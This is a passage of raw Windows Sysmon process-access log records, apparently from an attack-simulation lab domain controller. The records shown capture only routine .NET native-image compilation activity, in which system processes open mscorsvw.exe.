14:58:57.419{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-5D0F-00000000BB01}6472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.419{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-5D0F-00000000BB01}6472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.372{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-5C0F-00000000BB01}5220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.372{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-5C0F-00000000BB01}5220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.372{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-5C0F-00000000BB01}5220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.325{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-5B0F-00000000BB01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.309{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-5B0F-00000000BB01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.309{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-5B0F-00000000BB01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.278{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-5A0F-00000000BB01}5712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.263{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-5A0F-00000000BB01}5712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.263{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-5A0F-00000000BB01}5712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.231{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-590F-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.216{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-590F-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.216{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-590F-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.184{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-580F-00000000BB01}5632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.184{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-580F-00000000BB01}5632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.184{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-580F-00000000BB01}5632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.138{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-570F-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.122{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-570F-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.122{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-570F-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.075{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-560F-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.075{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-560F-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.075{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-560F-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 